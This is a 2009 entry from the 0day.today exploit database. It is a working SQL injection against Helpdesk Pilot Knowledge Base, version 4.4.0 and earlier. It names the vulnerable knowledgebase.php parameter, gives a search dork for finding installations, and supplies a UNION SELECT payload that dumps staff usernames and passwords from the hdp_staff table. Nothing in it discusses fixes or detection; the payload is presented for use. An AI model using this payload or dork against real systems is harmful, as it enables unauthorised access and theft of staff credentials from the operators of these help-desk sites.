[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Helpdesk Pilot Knowledge Base SQL injection vulnerability

Author
kaMtiEz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10485
Category
web applications
Date add
29-12-2009
Platform
unsorted
=========================================================
Helpdesk Pilot Knowledge Base SQL injection vulnerability
=========================================================

#############################################################################
 
[ Software Information ]
 
[+] Vendor : http://www.helpdeskpilot.com/
[+] Download : -
[+] version : 4.4.0 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : 1. Standard = $299.95
            2. Professional = $399.95
            3. Corporate = $499.95
[+] Location : INDONESIA - JOGJA
 
#############################################################################
 
 
[ HERE WE GO .. LIVE FROM JOGJA CITY ]
 
[ Vulnerable File ]
 
http://127.0.0.1/[kaMtiEz]/knowledgebase.php?act=art&article_id=[INDONESIANCODER]
 
[ Exploit ]
 
-666+union+select+concat_ws(0x3a,staff_username,staff_password)+from+hdp_staff--
 
===========================================================================



#  0day.today [2024-11-16]  #